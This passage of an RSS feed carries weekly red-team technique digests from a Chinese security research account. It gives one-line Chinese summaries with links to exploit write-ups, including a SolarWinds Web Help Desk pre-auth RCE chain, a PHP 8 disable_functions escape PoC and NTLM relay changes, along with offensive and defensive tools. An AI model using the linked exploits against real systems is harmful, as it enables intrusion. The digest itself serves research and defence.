1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://docs.google.com/presentation/d/1k4sp0NpIgjY2HdP9dgRCEDKRNvj-DSdZUoDIsJ3JUfk" target="_blank">https://docs.google.com/presentation/d/1k4sp0NpIgjY2HdP9dgRCEDKRNvj-DSdZUoDIsJ3JUfk</a></span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;color: rgb(62, 62, 62);padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">其他</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">VulHunt：基于MCP工具的漏洞发现和代码分析框架，包含反编译、数据流分析等功能</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/vulhunt-re/vulhunt" target="_blank">https://github.com/vulhunt-re/vulhunt</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Speakeasy v2.0.0b1：Windows恶意软件仿真框架，模拟执行二进制文件、驱动程序和shellcode</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/mandiant/speakeasy/releases/tag/v2.0.0b1" target="_blank">https://github.com/mandiant/speakeasy/releases/tag/v2.0.0b1</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">vscode-frida：非官方的Frida扩展，为VSCode提供Frida动态分析工具支持</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/ChiChou/vscode-frida" target="_blank">https://github.com/ChiChou/vscode-frida</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Ludus Defender Lab：Windows安全实验室配置项目，预装了MDE和MDI，包含错误配置的ADCS安装，用于检测覆盖测试</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/ZephrFish/ludus-defender-lab" target="_blank">https://github.com/ZephrFish/ludus-defender-lab</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Unredact：使用计算机视觉、字体感知约束求解和LLM推理来还原PDF文档中黑条遮挡文本的开源工具</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/Alex-Gilbert/unredact" target="_blank">https://github.com/Alex-Gilbert/unredact</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="color: rgb(62, 62, 62);letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">介绍检测管道成熟度模型，涵盖从基础到领先级别的检测能力演进，包括高保真检测、风险定制规则和数据科学驱动的异常检测</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://detect.fyi/detection-pipeline-maturity-model-076984779651" target="_blank">https://detect.fyi/detection-pipeline-maturity-model-076984779651</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">KSENTINEL：Linux内核系统调用完整性监控工具</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/MatheuZSecurity/ksentinel" target="_blank">https://github.com/MatheuZSecurity/ksentinel</a></span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="jpeg" data-w="344" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011099" src="https://wechat2rss.xlab.app/img-proxy/?k=2533f672&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FuZT6kWW1jCmtIibQf6nRE7v6BwxxSq9rvZwY9mEPibctG3P5NMwFmmq57lE4iamUiaGjctzd7OAFkSIYcxqgGiayDt7BialFO1GZXdFQZduicYGibWg%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">M01N Team公众号</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">聚焦高级攻防对抗热点技术</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">绿盟科技蓝军技术研究战队</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.9145907" data-s="300,640" data-type="png" data-w="562" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011101" src="https://wechat2rss.xlab.app/img-proxy/?k=9c60ae3a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FuZT6kWW1jCm2WHQEm0aibZ0X1viaOb23e5pkN2nuu7ByX5ZMibfrz4CMb4O4ELDx9WlDBPia7lg4Nrn7Rvr1XKYdsN8djicheRakanXglVCyEYNM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方攻防交流群</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">网络安全一手资讯</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻防技术答疑解惑</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">扫码加好友即可拉群</span></p></div></div></div></div><div style="margin: 10px 0% 0px;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;background-color: rgb(67, 146, 117);min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;padding: 10px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;text-align: center;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);font-size: 17px;padding: 0px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">往期推荐</span></b></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;box-sizing: border-box;"><div style="color: rgb(23, 54, 43);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494746&amp;idx=1&amp;sn=9dea57e1f5651252cff076bd01d30209&amp;scene=21#wechat_redirect" textvalue="每周蓝军技术推送（2026.2.28-2026.3.6）" data-itemshowtype="0" linktype="text" data-linktype="2">每周蓝军技术推送（2026.2.28-2026.3.6）</a></span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;box-sizing: border-box;"><div style="color: rgb(23, 54, 43);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494720&amp;idx=1&amp;sn=82df42a422757d53c5053087f96dc2b1&amp;scene=21#wechat_redirect" textvalue="每周蓝军技术推送（2026.2.7-2026.2.27）" data-itemshowtype="0" linktype="text" data-linktype="2">每周蓝军技术推送（2026.2.7-2026.2.27）</a></span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;box-sizing: border-box;"><div style="color: rgb(23, 54, 43);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494679&amp;idx=1&amp;sn=d41cda123693d36a363a9dc35c43bdb4&amp;scene=21#wechat_redirect" textvalue="每周蓝军技术推送（2026.1.31-2026.2.6）" data-itemshowtype="0" linktype="text" data-linktype="2">每周蓝军技术推送（2026.1.31-2026.2.6）</a></span></p></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=04932caf&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzkyMTI0NjA3OA%3D%3D%26mid%3D2247494751%26idx%3D1%26sn%3D06f539727afaa65f36aa707fce4d3d8a">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 13 Mar 2026 18:01:00 +0800</pubDate>
    </item>
    <item>
      <title>每周蓝军技术推送（2026.2.28-2026.3.6）</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494746&amp;idx=1&amp;sn=9dea57e1f5651252cff076bd01d30209</link>
      <description>关注高级攻防对抗技术热点，研究对手技术进行高级威胁模拟，研判攻击安全发展方向。</description>
      <content:encoded><![CDATA[<p>原创 <span>天元实验室</span> <span>2026-03-06 18:07</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=a972b10c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FTPGibEO8KBwbD5z6C0g2NAp2OicEl3fdbRrPUY2MuWIcreXMC0tGBdfWBviaqDPPyN63iawoWIujD6l1Fx5keMUib4w%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>关注高级攻防对抗技术热点，研究对手技术进行高级威胁模拟，研判攻击安全发展方向。</p>
  <div style="line-height: 1.6;letter-spacing: 0px;padding-right: 0px;padding-left: 0px;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4222222222222222" data-s="300,640" data-type="png" data-w="900" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011097" src="https://wechat2rss.xlab.app/img-proxy/?k=4dd6a5f6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FuZT6kWW1jClQTl08VIX9WSh16JWupkFOTX4ezias8wibnGqfUesuT0tveQ2ZLz2KfbiaYwBjc2jvrGcicE3AuCFMYmbaHut98GeD2ZDfzS1bZ4Y%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;color: rgb(62, 62, 62);padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">WEB安全</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="color: rgb(62, 62, 62);letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CVE-2025-40552和CVE-2025-40553：SolarWinds Web Help Desk存在认证绕过和远程代码执行漏洞链</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://labs.watchtowr.com/buy-a-help-desk-bundle-a-remote-access-solution-solarwinds-web-help-desk-pre-auth-rce-chain-s/" target="_blank">https://labs.watchtowr.com/buy-a-help-desk-bundle-a-remote-access-solution-solarwinds-web-help-desk-pre-auth-rce-chain-s/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">介绍绕过Apache FOP PostScript转义机制，利用GhostScript处理用户输入的安全漏洞</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://offsec.almond.consulting/bypassing-apache-fop-escaping-to-reach-ghostscript.html" target="_blank">https://offsec.almond.consulting/bypassing-apache-fop-escaping-to-reach-ghostscript.html</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">PHP 8沙箱逃逸POC，演示在类Unix系统上绕过disable_functions限制的技术</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/m0x41nos/TimeAfterFree" target="_blank">https://github.com/m0x41nos/TimeAfterFree</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;color: rgb(62, 62, 62);padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">内网渗透</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Windows Server 2025默认禁用NTLMv1客户端流量，影响NTLM中继攻击</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://decoder.cloud/2026/02/25/what-windows-server-2025-quietly-did-to-your-ntlm-relay/" target="_blank">https://decoder.cloud/2026/02/25/what-windows-server-2025-quietly-did-to-your-ntlm-relay/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">ADPulse：开源的AD安全审计工具，通过LDAP(S)连接域控制器，运行35项自动化安全检查</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/dievus/ADPulse" target="_blank">https://github.com/dievus/ADPulse</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Brutus：支持24种协议（SSH、SMB、数据库等）的凭证测试工具，集成了已知被泄露的SSH密钥</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div 